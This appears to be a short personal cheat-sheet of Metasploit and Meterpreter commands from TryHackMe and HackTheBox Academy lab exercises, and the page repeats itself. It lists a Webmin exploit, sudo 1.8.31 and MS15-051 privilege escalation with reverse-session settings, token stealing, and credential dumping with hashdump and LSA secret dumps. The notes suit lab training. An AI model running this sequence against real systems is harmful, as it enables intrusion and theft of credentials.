msfconsole/meterpreter

search webmin
use 0
show payloads
options

tryhackme - game zone

# sudo -V or use linpeas to see the sudo version
# sudo version 1.8.31
control+z 

search sudo 1.8.31
use 0 

options
set session 1
set lhost 10.10.15.43
set lport 4445

run

hackthebox academy - metasploit (sessions)

# meterpreter. You will get SERVICE user
getuid
steal_token 1836
getuid

crtl+z 
search local_exploit_suggester
options
run

# You will get SYSTEM user 
use exploit/windows/local/ms15_051_client_copy_images
options
run

# Then just find some credentials as SYSTEM which is root
hashdump
lsa_dump_sam
lsa_dump_secrets

hackthebox academy - metasploit (meterpreter)

Previouscurl Nextsqlmap

Last updated 1 year ago

msfconsole/meterpreter

search webmin
use 0
show payloads
options

tryhackme - game zone

# sudo -V or use linpeas to see the sudo version
# sudo version 1.8.31
control+z 

search sudo 1.8.31
use 0 

options
set session 1
set lhost 10.10.15.43
set lport 4445

run

hackthebox academy - metasploit (sessions)

# meterpreter. You will get SERVICE user
getuid
steal_token 1836
getuid

crtl+z 
search local_exploit_suggester
options
run

# You will get SYSTEM user 
use exploit/windows/local/ms15_051_client_copy_images
options
run

# Then just find some credentials as SYSTEM which is root
hashdump
lsa_dump_sam
lsa_dump_secrets

hackthebox academy - metasploit (meterpreter)

Previouscurl Nextsqlmap

Last updated 1 year ago